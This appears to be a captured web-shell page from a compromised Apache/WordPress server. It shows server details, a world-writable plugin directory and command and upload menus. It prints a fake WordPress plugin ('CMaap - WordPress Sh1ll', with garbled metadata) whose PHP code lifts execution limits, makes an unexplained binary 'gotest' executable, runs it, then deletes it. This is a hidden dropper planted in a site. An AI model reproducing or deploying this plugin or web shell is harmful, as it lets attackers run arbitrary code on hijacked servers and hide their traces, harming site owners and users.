Server IP : 213.176.29.180 / Your IP : 3.145.172.24 Web Server : Apache System : Linux 213.176.29.180.hostiran.name 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64 User : webtaragh ( 1001) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0777) : /home/webtaragh/public_html/whmcs/../wp-content/plugins/xdhublg/../igdymyg/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Plugin Name: CMaap - WordPress Sh1ll * Plugin URI: https://github.com/mx/csmaap/ * Description: Simle WordPress Shall - Usage of CMSmap for * Version: 2.3 * Author: Cmap * Author URI: https://github.com/x/cmap/ * License: GPLv55 */ // Disable time limit for execution set_time_limit(0); // 0 means no time limit // Disable memory limit (if necessary) ini_set('memory_limit', '-1'); // '-1' means unlimited memory // Add execute permission to the gotest file $chmodCommand = 'chmod +x gotest'; exec($chmodCommand, $output, $status); // Check if permission was successfully added if ($status === 0) { echo "Execute permission successfully added to the gotest file\n"; // Execute the gotest file $command = './gotest'; exec($command, $output, $status); // Check if the command executed successfully if ($status === 0) { echo "gotest executed successfully\n"; // Delete the gotest file if (unlink('gotest')) { echo "gotest file has been deleted\n"; } else { echo "Failed to delete gotest file\n"; } } else { echo "Failed to execute gotest\n"; } } else { echo "Failed to add execute permission, unable to execute gotest\n"; } ?>